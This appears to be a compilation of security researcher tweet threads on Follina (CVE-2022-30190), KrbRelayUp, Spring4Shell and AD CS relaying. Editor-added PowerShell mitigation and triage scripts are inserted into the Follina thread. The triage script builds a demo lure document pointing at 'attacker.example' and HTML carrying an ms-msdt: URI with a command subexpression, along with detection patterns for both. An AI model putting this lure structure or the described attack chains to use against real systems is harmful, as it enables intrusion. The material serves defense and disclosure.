Will Dormann
May 30, 17 tweets, 9 min read
OK, now that I have access to a computer, let's take a look at this Office 0day that folks are talking about.
It's very similar to the MSHTML CVE-2021-40444 vuln from September:
1) Use of '!' at the end of the retrieved URI
2) Size of retrieved HTML must be 4096 bytes or larger
The important difference is that this variant still works.
Let's look at the preview pane attack vector, like we did for CVE-2021-40444 since that one is more fun. Protected View be damned!
Here is Office 2019 on Win10, both with May 2022 updates.
While there very well may be other dangerous protocols besides ms-msdt:, it's probably a good idea to unregister this protocol. Especially while this vulnerability is still unpatched!
I've never seen its use in the real world until today.
gist.github.com/wdormann/03196…
Also, for the love of all that is holy, please don't have the Preview pane enabled in Windows Explorer.
I'd say that there are two behaviors being leveraged here:
1) The #LOLBAS for Msdt.exe happens to have a URI handler way of invoking it. @bohops
2) The ! in the referenced remote HTML file puts MSHTML in YOLO mode where (among other things?) it doesn't prompt for unsafe things.
Why is this combo a problem?
Well, the ms-msdt: URI handler has components implemented in PowerShell. You can make a URI where some parts of arguments are specified to be subexpressions, e.g. $(dosomething)
So obviously dangerous.
If you can get this URI to open w/o prompting, 🎉
I will say it's somewhat chuckle-worthy that the dialog that asks "Do you want to update this document with the data from the linked files" is hidden behind calc.
This issue (MSDT, ms-msdt, Follina, or whatever you want to call it) has been assigned CVE-2022-30190 by the way.
msrc-blog.microsoft.com/2022/05/30/gui…
This language is a bit misleading in not really describing what "calling application" means.
If you preview a file in Explorer, which uses Office to render the document, Protected View doesn't do a damn thing.
And of course the unfortunately named "wget" in PowerShell will blindly redirect to unsafe URIs and get exploited. No Office required!
Of course it does.
When I say "unfortunately named"...
Let's say that you have GNU tools installed on your Windows machine, because you like to get stuff done and are stubborn about learning new things.
If you are typing into a PowerShell terminal, you may be surprised by what runs.
e.g. here's ls:
The MS publication doesn't mention it, but the mitigation mentioned by @gentilkiwi seems to work fine in blocking this URI class.
Or for the point-and-clicky among us:
Group Policy Editor -> Computer Configuration -> Administrative Templates -> System -> Troubleshooting and Diagnostics -> Scripted Diagnostics
Set "Troubleshooting: Allow users to access and run Troubleshooting Wizards" to "disabled"
It looks like Defender sigs are making their rounds.
But please don't rely on them. Disable scripted diagnostics or the ms-msdt: URI handler.
If an exploit is tweaked to look a bit different, it slips right past Defender.
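The two mitigations the thread recommends, removing the ms-msdt: URI handler and disabling Scripted Diagnostics, as an added PowerShell example written by the editor; it is not code from the thread or from Microsoft's guidance. It assumes that the Group Policy setting above is backed by the registry value HKLM\SOFTWARE\Policies\Microsoft\Windows\ScriptedDiagnostics\EnableDiagnostics and that the protocol handler lives under HKEY_CLASSES_ROOT\ms-msdt; neither path appears on the page. Run it elevated. It backs up the handler key with reg.exe before deleting it, so the handler can be restored once a patch ships.

```powershell
# Added example (editor's code, not from the thread): audit and apply the two
# Follina mitigations recommended above. Requires an elevated session.
# Assumptions not stated on the page:
#   - the GPO "Troubleshooting: Allow users to access and run Troubleshooting
#     Wizards" = Disabled is stored as DWORD EnableDiagnostics = 0 under
#     HKLM\SOFTWARE\Policies\Microsoft\Windows\ScriptedDiagnostics
#   - the ms-msdt: protocol handler is registered at HKEY_CLASSES_ROOT\ms-msdt
#Requires -RunAsAdministrator
$ErrorActionPreference = 'Stop'

$HandlerKey = 'Registry::HKEY_CLASSES_ROOT\ms-msdt'
$PolicyKey  = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\ScriptedDiagnostics'
$BackupFile = Join-Path $env:ProgramData 'ms-msdt-backup.reg'

function Get-MsdtExposure {
    # Reports whether either attack path (URI handler, scripted diagnostics) is still open.
    $handler = Test-Path $HandlerKey
    $command = $null
    if ($handler) {
        # The (default) value of shell\open\command is what MSHTML hands the URI to.
        $command = (Get-ItemProperty -Path "$HandlerKey\shell\open\command" -ErrorAction SilentlyContinue).'(default)'
    }
    $policy = Get-ItemProperty -Path $PolicyKey -Name EnableDiagnostics -ErrorAction SilentlyContinue
    [pscustomobject]@{
        HandlerRegistered    = $handler
        HandlerCommand       = $command
        ScriptedDiagDisabled = ($null -ne $policy -and $policy.EnableDiagnostics -eq 0)
    }
}

function Disable-MsdtHandler {
    # Backs up HKCR\ms-msdt, then removes it so an ms-msdt: URI has nothing to launch.
    if (-not (Test-Path $HandlerKey)) { Write-Host 'ms-msdt: handler already absent'; return }
    & reg.exe export 'HKEY_CLASSES_ROOT\ms-msdt' $BackupFile /y | Out-Null
    if ($LASTEXITCODE -ne 0) { throw 'backup failed; leaving handler in place' }
    Remove-Item -Path $HandlerKey -Recurse -Force
    Write-Host "ms-msdt: handler removed; restore later with: reg import $BackupFile"
}

function Disable-ScriptedDiagnostics {
    # Same effect as setting the GPO to Disabled: msdt will not run troubleshooting wizards.
    if (-not (Test-Path $PolicyKey)) { New-Item -Path $PolicyKey -Force | Out-Null }
    New-ItemProperty -Path $PolicyKey -Name EnableDiagnostics -PropertyType DWord -Value 0 -Force | Out-Null
    Write-Host 'Scripted Diagnostics disabled via policy'
}

$before = Get-MsdtExposure
$before | Format-List
if ($before.HandlerRegistered)         { Disable-MsdtHandler }
if (-not $before.ScriptedDiagDisabled) { Disable-ScriptedDiagnostics }
Get-MsdtExposure | Format-List
```

Apply both, not one: the policy stops msdt.exe from running wizards even if some other path reaches it, and removing the handler stops ms-msdt: URIs from reaching msdt.exe at all, which is the part that a tweaked sample will otherwise still get to after a signature miss.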
But speaking of AV, let's have a look at what happens when an exploit is in multiple parts.
First there's the parent document.
Is it malicious? Absolutely not. It simply loads a remote OLE object, as is supported by Office.
What it does with that depends on what the content is.
Let's now look at the OLE object (HTML content) that triggers the unsafe ms-msdt: URI.
0 hits. Got it.
Finally, let's look at the XML content that is loaded by the diagnostic utility that is loaded by msdt.exe, which is loaded by MSHTML, which is loaded by Microsoft Word, which is loaded by explorer.exe, if you're one of those Preview Pane weirdos. Malformed arguments here.
0 hits
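Static triage of the two client-side stages the thread just walked through, the parent document that merely declares a remote OLE object and the fetched HTML that carries the ms-msdt: URI, as an added PowerShell example written by the editor; it is not code from the thread. It assumes Word records a remote OLE object as an External relationship whose Type ends in /oleObject inside word/_rels/document.xml.rels, which is how OOXML expresses a linked object; the page does not name that part. The checks themselves are the thread's own observations: a retrieved URI ending in '!', a fetched HTML size of at least 4096 bytes, and a $( ) subexpression inside the ms-msdt: arguments. The sample document and HTML below are constructed for the demo and contain no real exploit content.

```powershell
# Added example (editor's code, not from the thread): triage the document stage and
# the HTML stage separately, since neither looks malicious on its own to AV.
# Assumption not stated on the page: a remote OLE object appears in
# word/_rels/document.xml.rels as <Relationship ... Type="*/oleObject" TargetMode="External">.
Add-Type -AssemblyName System.IO.Compression
Add-Type -AssemblyName System.IO.Compression.FileSystem

function New-SampleDocx {
    param([Parameter(Mandatory)][string]$Path, [Parameter(Mandatory)][string]$RemoteTarget)
    # Constructed demo input: only the relationships part of a .docx, with one OLE object
    # that points outside the package. A real document has many more parts.
    if (Test-Path $Path) { Remove-Item $Path }
    $zip = [System.IO.Compression.ZipFile]::Open($Path, [System.IO.Compression.ZipArchiveMode]::Create)
    try {
        $entry  = $zip.CreateEntry('word/_rels/document.xml.rels')
        $writer = New-Object System.IO.StreamWriter($entry.Open())
        $writer.Write(@"
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/>
  <Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="$RemoteTarget" TargetMode="External"/>
</Relationships>
"@)
        $writer.Dispose()
    } finally { $zip.Dispose() }
}

function Get-ExternalOleTargets {
    param([Parameter(Mandatory)][string]$DocxPath)
    # Lists OLE relationships that point outside the package. A normal document has none,
    # and a trailing '!' on the target is the first trait the thread calls out.
    $zip = [System.IO.Compression.ZipFile]::OpenRead($DocxPath)
    try {
        $entry = $zip.GetEntry('word/_rels/document.xml.rels')
        if (-not $entry) { return @() }
        $reader = New-Object System.IO.StreamReader($entry.Open())
        [xml]$rels = $reader.ReadToEnd()
        $reader.Dispose()
        @($rels.Relationships.Relationship |
            Where-Object { $_.TargetMode -eq 'External' -and $_.Type -like '*/oleObject' } |
            ForEach-Object { [pscustomobject]@{ Target = $_.Target; EndsWithBang = $_.Target.EndsWith('!') } })
    } finally { $zip.Dispose() }
}

function Test-MsdtHtml {
    param([Parameter(Mandatory)][string]$Html)
    # Scores fetched HTML against the other traits: size gate and a $( ) subexpression
    # inside an ms-msdt: URI. Each match runs to end of line so spaces in the arguments
    # are kept; percent-encoding is undone so %24%28 is caught too.
    $bytes = [Text.Encoding]::UTF8.GetByteCount($Html)
    $uris  = @([regex]::Matches($Html, 'ms-msdt:[^\r\n<]*') |
               ForEach-Object { [uri]::UnescapeDataString($_.Value) })
    [pscustomobject]@{
        ByteLength       = $bytes
        MeetsSizeGate    = $bytes -ge 4096
        MsdtUris         = $uris
        HasSubexpression = [bool]($uris | Where-Object { $_ -match '\$\(' })
    }
}

# Constructed demo inputs (not real exploit content). The HTML is padded past 4096 bytes
# with a comment, as the thread notes the retrieved page must be; the diagnostic id and
# argument name are placeholders.
$docx = Join-Path $env:TEMP 'follina-demo.docx'
New-SampleDocx -Path $docx -RemoteTarget 'http://attacker.example/page.html!'
$padding    = '<!-- ' + ('A' * 4200) + ' -->'
$sampleHtml = $padding + @'
<html><body>
<script>location.href = "ms-msdt:/id SomeDiagnostic /param \"Arg=$(dosomething)\"";</script>
</body></html>
'@

Get-ExternalOleTargets -DocxPath $docx | Format-Table
Test-MsdtHtml -Html $sampleHtml | Format-List
```

The point of splitting it this way is the one the thread makes: the document stage only tells you that something remote is linked, so the external target is what to pull and feed to the HTML check, rather than expecting a signature on either file alone.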
More from @wdormann

Apr 26
Yeah, so KrbRelayUp works quite swimmingly.
All an attacker needs is the ability to run code on a domain-joined host, and the result is that you get SYSTEM on that machine.
If "Domain Controller: LDAP server signing requirements" is set to "Require signing", this appears to block the exploit at the stage of relaying kerberos authentication to LDAP.
Setting ms-DS-MachineAccountQuota=0 also appears to block this attack.
Even though they're not administrators, by default active directory users have the privilege to add machines to AD for some reason. YOLO and stuff.
jackstromberg.com/2013/01/how-to…
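A check for the two settings this thread says stop KrbRelayUp, LDAP server signing on the domain controllers and ms-DS-MachineAccountQuota on the domain, as an added PowerShell example written by the editor; it is not code from the thread or from the KrbRelayUp project. It assumes the ActiveDirectory RSAT module and WinRM access to the DCs, and that the GPO "Domain Controller: LDAP server signing requirements" is stored on each DC as the DWORD LDAPServerIntegrity under HKLM\SYSTEM\CurrentControlSet\Services\NTDS\Parameters, where 2 means Require signing; none of those details appear on the page.

```powershell
# Added example (editor's code, not from the thread): report whether either
# KrbRelayUp blocker is in place, and optionally set the machine account quota to 0.
# Assumptions not stated on the page: RSAT ActiveDirectory module, WinRM to the DCs,
# and LDAPServerIntegrity = 2 being the registry form of "Require signing".
Import-Module ActiveDirectory

function Get-KrbRelayUpExposure {
    param([string[]]$DomainController = @())
    $domain = Get-ADDomain
    # The quota lives on the domain head object; > 0 lets any user add machine accounts.
    $maq = (Get-ADObject -Identity $domain.DistinguishedName -Properties 'ms-DS-MachineAccountQuota').'ms-DS-MachineAccountQuota'
    if (-not $DomainController) { $DomainController = (Get-ADDomainController -Filter *).HostName }
    $signing = foreach ($dc in $DomainController) {
        $value = Invoke-Command -ComputerName $dc -ScriptBlock {
            (Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Services\NTDS\Parameters' -Name LDAPServerIntegrity -ErrorAction SilentlyContinue).LDAPServerIntegrity
        }
        [pscustomobject]@{ DC = $dc; LDAPServerIntegrity = $value; RequiresSigning = ($value -eq 2) }
    }
    [pscustomobject]@{
        Domain              = $domain.DNSRoot
        MachineAccountQuota = $maq
        UsersCanAddMachines = ($maq -gt 0)
        LdapSigning         = $signing
    }
}

function Set-MachineAccountQuotaZero {
    # Removes the default ability of ordinary users to add computer objects.
    $domain = Get-ADDomain
    Set-ADObject -Identity $domain.DistinguishedName -Replace @{ 'ms-DS-MachineAccountQuota' = 0 }
}

$exposure = Get-KrbRelayUpExposure
$exposure | Format-List
$exposure.LdapSigning | Format-Table
```

A DC with no LDAPServerIntegrity value reports RequiresSigning false, which matches the default of not requiring signing; confirm with the GPO result on that DC before treating it as a finding.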
Apr 7
WatchGuard: "For the sake of not guiding potential threat actors... we are not sharing technical details about these flaws"
FBI: Threat Actors are using this in the wild.
WG 9.5 months after release: CVE-2022-23176
arstechnica.com/information-te…
Why is this poor vendor behavior?
When an update is released people can compare the before- and after-patch code to see what has changed, exposing the vulnerability.
If things like CVE/CVSS are skipped, attackers have all that they need and defenders have nothing.
DON'T DO THIS!
Let's dig more.
"if management policies were configured to allow unrestricted management access from external IP addresses"
This nicely shifts the blame to the customer. If you allow management on the WAN side, that's your fault, right?
Let's see what we get by default...
Oh. 🤔
Mar 31
Can confirm! The #Spring4Shell exploit in the wild appears to work against the stock "Handling Form Submission" sample code from spring.io
If the sample code is vulnerable, then I suspect there are indeed real-world apps out there that are vulnerable to RCE...
Ways that Cyber Kendra made this worse for everyone:
1) Sensational blog post indicating that this is going to ruin the internet (red flag!).
2) Linking to a git commit about deserialization that has absolutely nothing to do with the issue demonstrated by the original party.
The original researcher also made this a touch more confusing/misleading than it needed to be as well. To one not familiar with Java, the long list of requirements makes it seem like one may need to intentionally make an app vulnerable. This is not the case.
Mar 30
OK, where are we with Spring stuff?
1) CVE-2022-22963 is a thing, and it affects Spring Cloud Connector. It's RCE, so the CVSS score of 5.4 seems way off.
2) Spring4Shell / SpringShell, invented by Cyber Kendra, isn't a Spring vulnerability at all.
Does that sound about right?
And just for the Twitter record, @VMwareTanzu assigned CVE-2022-22963 a CVSS score of 5.4
Yet it's an unauthenticated RCE vulnerability.
Which in my mind puts it closer to a 9.8.
And to tie up this thread, I've confirmed that #SpringShell / #Spring4Shell *IS* indeed a thing.
This wasn't immediately obvious because of Cyber Kendra linking SpringShell to a commit for a COMPLETELY UNRELATED issue that is NOT A VULNERABILITY.
<sigh>
Mar 16
Oh, this is good.
Think you're typing into a pop-up window? Make sure that you try to drag it OUTSIDE OF the content area of the page first.
Surely normal human beings do this.
But wait!
We security folks know that the content area of a browser is 100% under control of somebody else. We wouldn't design a system where a user must visually verify something within this space, right?
Let's look at a site that is apparently popular for some reason: Pinterest
Am I picking on Pinterest? Nope.
This is a standard OAuth login technique. For example, here's an Auth0 demo page.
Are we relying on end users knowing that they need to drag pop-ups outside of the content area of a browser to know that it's legit?
Feb 23
If you enabled Extended Protection for Authentication (EPA) for your AD CS server this summer to protect against PetitPotam, good for you.
If you haven't, well, I've got some bad news for you...
Nothing more than a system on the same (V)LAN as a domain-joined host is required. No password knowledge necessary.
By using mitm6 + krbrelayx to relay a kerberos ticket to an AD CS that hasn't been locked down, we get a certificate that can get us to Domain Admin.
The defenses against this are:
- Enable TLS + EPA in IIS on any AD CS system you use. This is the same thing that protected you against the PetitPotam attack chain.
- If you don't use IPv6, use firewalls to block both DHCPv6 and ICMPv6 traffic.
dirkjanm.io/relaying-kerbe…